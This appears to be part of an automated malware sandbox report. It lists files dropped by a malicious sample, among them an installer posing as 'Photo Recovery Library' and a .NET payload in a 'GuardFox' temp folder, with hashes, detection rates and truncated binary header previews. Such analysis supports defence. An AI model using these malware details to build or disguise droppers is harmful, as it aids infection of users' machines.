                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                        Category:modified
                                                                                                                                        Size (bytes):5345280
                                                                                                                                        Entropy (8bit):6.63948529168088
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:98304:lR+3fIUMIN/0pG6dDIBCZP/qr3zRgTiSZlWWqp9ebFP+m:b9Rc6dkgZPY2zZH896FP+m
                                                                                                                                        MD5:84FDC770D4A9ECD786E59A0C9F7F9C26
                                                                                                                                        SHA1:8B8FFADE1B9E72AFC8FB6F8B456EEEC92B051F5C
                                                                                                                                        SHA-256:64458D205E25C3D036172AE30C7C2D214ECF0EAE5BFE18BD99E7011E94748B8E
                                                                                                                                        SHA-512:1779C4FCB4B96A9FE9277E86F51181055D0903296BEBA5DD99523F9F06F3191807983648139198A82D894370F85684346E6E53AC68AB7DE5C5CAE78EB861C0E0
                                                                                                                                        Malicious:true
                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................PE..L......g..................#..:.......?#.......#...@...........................Q.....$eR.....................................t.#.T....`$.h.-...........................................................................#..............................text.....#.......#.................`....rdata...D....#..F....#.............@..@.data...xc....#..0....#.............@....rsrc.....-..`$...-...$.............@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                        C:\Users\user\AppData\Local\Photo Recovery Library 5.7\sqlite3.dll (copy)

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-6SVL9.tmp\1609a74d-2a2b-4f95-9570-07a864ac654e.tmp
                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):645592
                                                                                                                                        Entropy (8bit):6.50414583238337
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:12288:i0zrcH2F3OfwjtWvuFEmhx0Cj37670jwX+E7tFKm0qTYh:iJUOfwh8u9hx0D70NE7tFTYh
                                                                                                                                        MD5:E477A96C8F2B18D6B5C27BDE49C990BF
                                                                                                                                        SHA1:E980C9BF41330D1E5BD04556DB4646A0210F7409
                                                                                                                                        SHA-256:16574F51785B0E2FC29C2C61477EB47BB39F714829999511DC8952B43AB17660
                                                                                                                                        SHA-512:335A86268E7C0E568B1C30981EC644E6CD332E66F96D2551B58A82515316693C1859D87B4F4B7310CF1AC386CEE671580FDD999C3BCB23ACF2C2282C01C8798C
                                                                                                                                        Malicious:true
                                                                                                                                        Antivirus:
                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....=S.v..?......!................X..............`......................... ......8......... .................................L................................'......................................................p............................text...............................`.0`.data...............................@.@..rdata..$...........................@.@@.bss..................................@..edata..............................@.0@.idata..L...........................@.0..CRT................................@.0..tls.... ...........................@.0..reloc...'.......(..................@.0B/4......`....0......................@.@B/19..........@......................@..B/35.....M....P......................@..B/51.....`C...`...D..................@..B/63..................8..............@..B/77..................F..............@..B/89..................R..

                                                                                                                                        C:\Users\user\AppData\Local\Photo Recovery Library 5.7\uninstall\is-DH20J.tmp

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-6SVL9.tmp\1609a74d-2a2b-4f95-9570-07a864ac654e.tmp
                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):722597
                                                                                                                                        Entropy (8bit):6.522036773433455
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:12288:jQmCh1/aLmSKrPD37zzH2A6QGgx/bsQYq9KgERkVfzrrNVyblW4cNaf/yxyRh:jQrh1yLmSKrPD37zzH2A6QD/IpqggE2G
                                                                                                                                        MD5:453F22B226981E07FF789EB5468BD5DF
                                                                                                                                        SHA1:AF110D44F8F592D51D4ADA6870B8AD405DC86FFE
                                                                                                                                        SHA-256:4F16558E1AD75ABCE509BAC26BDF01938A714282932642875443478F00F81691
                                                                                                                                        SHA-512:B807DE56247A4CBFA5FB70F1B526AB42BB2B4DC1F872854EE4BECE5D20B3EF2BE50706AAEE0A70C5BA13C5999349BDE55F8FD3EB78699F59F57538A9AD4FB77B
                                                                                                                                        Malicious:true
                                                                                                                                        Antivirus:
                                                                                                                                        • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                                        Preview:MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*..........................................@.......................................@......@...............................&........................................................... ......................................................CODE....$........................... ..`DATA.... ...........................@...BSS......................................idata...&.......(..................@....tls.....................................rdata....... ......................@..P.reloc......0......................@..P.rsrc...............................@..P.....................f..............@..P........................................................................................................................................

                                                                                                                                        C:\Users\user\AppData\Local\Photo Recovery Library 5.7\uninstall\unins000.dat

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-6SVL9.tmp\1609a74d-2a2b-4f95-9570-07a864ac654e.tmp
                                                                                                                                        File Type:InnoSetup Log Photo Recovery Library, version 0x30, 5070 bytes, 093954\user, "C:\Users\user\AppData\Local\Photo Recovery Library 5.7"
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):5070
                                                                                                                                        Entropy (8bit):4.80057017505975
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:96:GT5EqdWg488ZpS64ugi99+eOIhKoa7ICSss/Ln3LWh+b6:edWg48WpSFuEHIhKvICSsAn3ST
                                                                                                                                        MD5:2494BE239A51211E607C89D05A9A5417
                                                                                                                                        SHA1:2203534F48CB692B37C74D592122D1DF940348D9
                                                                                                                                        SHA-256:F793785BF956ED4060C57BF9737B8B13ED466D96120051EAB2229B34712D50D1
                                                                                                                                        SHA-512:177D8540097CA35E1C95AF0C810FF58A80C7F7174B5FD42F8E35ABF0FCA1F632B11FED2434DF7B9142230892D73DD4439B359045A0485A511FFD94EFBDAEDD3A
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:Inno Setup Uninstall Log (b)....................................Photo Recovery Library..........................................................................................................Photo Recovery Library..........................................................................................................0...........%...............................................................................................................@P.L.........*.&......Y....093954.user8C:\Users\user\AppData\Local\Photo Recovery Library 5.7.................. ............IFPS.............................................................................................................BOOLEAN..............TWIZARDFORM....TWIZARDFORM.........TPASSWORDEDIT....TPASSWORDEDIT...........................................!MAIN....-1..(...dll:kernel32.dll.CreateFileA..............$...dll:kernel32.dll.WriteFile............"...dll:kernel32.dll.CloseHandle........"...dll:kernel32.dll.ExitProcess........%...d

                                                                                                                                        C:\Users\user\AppData\Local\Photo Recovery Library 5.7\uninstall\unins000.exe (copy)

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-6SVL9.tmp\1609a74d-2a2b-4f95-9570-07a864ac654e.tmp
                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):722597
                                                                                                                                        Entropy (8bit):6.522036773433455
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:12288:jQmCh1/aLmSKrPD37zzH2A6QGgx/bsQYq9KgERkVfzrrNVyblW4cNaf/yxyRh:jQrh1yLmSKrPD37zzH2A6QD/IpqggE2G
                                                                                                                                        MD5:453F22B226981E07FF789EB5468BD5DF
                                                                                                                                        SHA1:AF110D44F8F592D51D4ADA6870B8AD405DC86FFE
                                                                                                                                        SHA-256:4F16558E1AD75ABCE509BAC26BDF01938A714282932642875443478F00F81691
                                                                                                                                        SHA-512:B807DE56247A4CBFA5FB70F1B526AB42BB2B4DC1F872854EE4BECE5D20B3EF2BE50706AAEE0A70C5BA13C5999349BDE55F8FD3EB78699F59F57538A9AD4FB77B
                                                                                                                                        Malicious:true
                                                                                                                                        Antivirus:
                                                                                                                                        • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                                        Preview:MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*..........................................@.......................................@......@...............................&........................................................... ......................................................CODE....$........................... ..`DATA.... ...........................@...BSS......................................idata...&.......(..................@....tls.....................................rdata....... ......................@..P.reloc......0......................@..P.rsrc...............................@..P.....................f..............@..P........................................................................................................................................

                                                                                                                                        C:\Users\user\AppData\Local\Temp\GuardFox\1609a74d-2a2b-4f95-9570-07a864ac654e.exe

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Users\user\Desktop\12321321.exe
                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):4588286
                                                                                                                                        Entropy (8bit):7.998686424491839
                                                                                                                                        Encrypted:true
                                                                                                                                        SSDEEP:98304:3UzFjCwQYfBmiaINgQyLJPL844UjUj/GkhFCgy77:kRjFlYiknLJD8NFjzhBy77
                                                                                                                                        MD5:E4265C65F6F798BDC3F1644CAAA09379
                                                                                                                                        SHA1:5C72CD53FB3091B5CDB44021A05ABD4CB116EF32
                                                                                                                                        SHA-256:A5847CF2D171622E07EC1CB81015033C57F60E7BF3E3F808A5DBDCB44FFE4498
                                                                                                                                        SHA-512:841B703FEEF6034AD8BE9707883B580A08764CAA74D94C6FC4D31AC3A0FB88477C792F742373CE597ECEF7CAA0457322E0041DE3DE32C2D24C6DFF0029B7F99D
                                                                                                                                        Malicious:true
                                                                                                                                        Antivirus:
                                                                                                                                        • Antivirus: ReversingLabs, Detection: 8%
                                                                                                                                        Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................F....................@..........................@............@......@..............................P........,..........................................................................................................CODE....0........................... ..`DATA....P...........................@...BSS......................................idata..P...........................@....tls.....................................rdata..............................@..P.reloc..............................@..P.rsrc....,.......,..................@..P.............@......................@..P........................................................................................................................................

                                                                                                                                        C:\Users\user\AppData\Local\Temp\GuardFox\c9f74e53-58d1-13d2-8abb-0195719b8be2.exe

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Users\user\Desktop\12321321.exe
                                                                                                                                        File Type:PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):3161088
                                                                                                                                        Entropy (8bit):7.997471703086555
                                                                                                                                        Encrypted:true
                                                                                                                                        SSDEEP:98304:NxEvG49LjUIydTFy3n3yeGolV+z/6xqQ1:NevlV603+Gr1
                                                                                                                                        MD5:A875EFEC27F37FB4E42141BBA8771C65
                                                                                                                                        SHA1:55155168188F8FBB617A0DF6FB2E19FBCB459040
                                                                                                                                        SHA-256:A20AF6C09E452F7E5D91B5B11D95AE5EB9C6C3A41595104029E6458C4ED6BAC9
                                                                                                                                        SHA-512:70A3903F23798FDED149FFFE75F71AE3B27E4314F12E7C5A921A57019A1C6EEFE0E394F3C7EF0801CB8736BE8C14B3CE1EDC88A30AA4C1A2894EBDF2A27B9495
                                                                                                                                        Malicious:true
                                                                                                                                        Antivirus:
                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                        • Antivirus: ReversingLabs, Detection: 73%
                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.....Zg.........."......./.............. ....@...... ........................0...........@.........................................................../.............................................................................................. ..H............text...../.. ..../................. ..`.rsrc........./......./.............@..@........................................H........H.. F......=...0...aE/..G.......................................0..P........+@~$...+<+A.,.~%...~.... ....(....(....*~%...~.... ....(....(....*.+.(....+..+...(O...*b.....+.+.*(-...+.(....+.....0................8..........8..........8....~&.....(....,.~%...~.... ....(....(....+.~%...~.... ....(....(....~&.....(....,.~%...~.... ]...(....(....*~%...~.... ....(....(....*(P...8\...(P...8]...(P...8^......(O...*b.....+.+.*(-...+.(....+.....0..........8....8....~%...~)...~.... ....8.

                                                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2f32i1hp.0nf.ps1

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):60
                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_csloock5.czp.psm1

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):60
                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fzbwqaep.qtw.psm1

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):60
                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ghdrnltn.lqp.ps1

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):60
                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kdmuc55t.irx.ps1

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):60
                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wxzaixbc.rfr.psm1

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):60
                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ytkrnluk.p5m.ps1

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):60
                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zkywkm1i.ceq.psm1

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):60
                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                        C:\Users\user\AppData\Local\Temp\d.ghSlh.exe (copy)

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\GuardFox\c9f74e53-58d1-13d2-8abb-0195719b8be2.exe
                                                                                                                                        File Type:PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):3161088
                                                                                                                                        Entropy (8bit):7.997471703086555
                                                                                                                                        Encrypted:true
                                                                                                                                        SSDEEP:98304:NxEvG49LjUIydTFy3n3yeGolV+z/6xqQ1:NevlV603+Gr1
                                                                                                                                        MD5:A875EFEC27F37FB4E42141BBA8771C65
                                                                                                                                        SHA1:55155168188F8FBB617A0DF6FB2E19FBCB459040
                                                                                                                                        SHA-256:A20AF6C09E452F7E5D91B5B11D95AE5EB9C6C3A41595104029E6458C4ED6BAC9
                                                                                                                                        SHA-512:70A3903F23798FDED149FFFE75F71AE3B27E4314F12E7C5A921A57019A1C6EEFE0E394F3C7EF0801CB8736BE8C14B3CE1EDC88A30AA4C1A2894EBDF2A27B9495
                                                                                                                                        Malicious:true
                                                                                                                                        Antivirus:
                                                                                                                                        • Antivirus: ReversingLabs, Detection: 73%
                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.....Zg.........."......./.............. ....@...... ........................0...........@.........................................................../.............................................................................................. ..H............text...../.. ..../................. ..`.rsrc........./......./.............@..@........................................H........H.. F......=...0...aE/..G.......................................0..P........+@~$...+<+A.,.~%...~.... ....(....(....*~%...~.... ....(....(....*.+.(....+..+...(O...*b.....+.+.*(-...+.(....+.....0................8..........8..........8....~&.....(....,.~%...~.... ....(....(....+.~%...~.... ....(....(....~&.....(....,.~%...~.... ]...(....(....*~%...~.... ....(....(....*(P...8\...(P...8]...(P...8^......(O...*b.....+.+.*(-...+.(....+.....0..........8....8....~%...~)...~.... ....8.

                                                                                                                                        C:\Users\user\AppData\Local\Temp\is-6SVL9.tmp\1609a74d-2a2b-4f95-9570-07a864ac654e.tmp